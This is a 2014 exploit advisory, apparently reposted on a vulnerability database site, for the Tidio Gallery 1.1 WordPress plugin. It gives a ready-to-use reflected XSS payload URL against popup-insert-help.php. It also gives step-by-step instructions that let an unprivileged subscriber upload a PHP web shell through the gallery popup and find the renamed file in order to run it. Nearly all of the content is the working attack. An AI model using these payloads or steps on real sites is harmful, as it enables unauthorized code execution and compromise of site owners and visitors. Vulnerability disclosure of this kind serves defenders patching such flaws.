WordPress Tidio Gallery 1.1 Shell Upload / XSS

2014.07.15
Risk: High
Local: No
Remote: Yes
CVE: N/A

###################### # Exploit Title : Wordpress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities # Exploit Author : Claudio Viviani # Vendor Homepage : http://www.tidioelements.com/ # Software Link : http://downloads.wordpress.org/plugin/tidio-gallery.zip # Date : 2014-07-14 # Tested on : Windows 7 / Mozilla Firefox ###################### # Location : http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php -> XSS http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-post.php -> Upload Shell ###################### # Vulnerablity n°1: XSS Reflected Unauthenticated http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="/><script>alert(1);</script> # Vulnerablity n°2: Unprivileged user like subscriber could upload shell script. The plugin rename file with "md5(microtime())" php functions. 1) Connect to url: http://VICTIM/wp-admin/admin-ajax.php?action=tidio_gallery_popup_insert_post 2) Click "add gallery" button 3) Click "edit" option 4) Click "add image" button 5) Click "upload" option and select php shell from local drive 6) Refresh page (ex. press F5 key) 7) View source page (ex. right-click -> view source page) and search string like this: "fileUrl":"http://VICTIM/wp-content/uploads/2014/07/14625a7ca5df93c49910a502ef9aabfb.php" Skip file with "*-thumb.php" extension. 8) Open browser and connect to http://VICTIM/wp-content/uploads/2014/07/14625a7ca5df93c49910a502ef9aabfb.php ##################### Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ #####################

References:

http://downloads.wordpress.org/plugin/tidio-gallery.zip


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top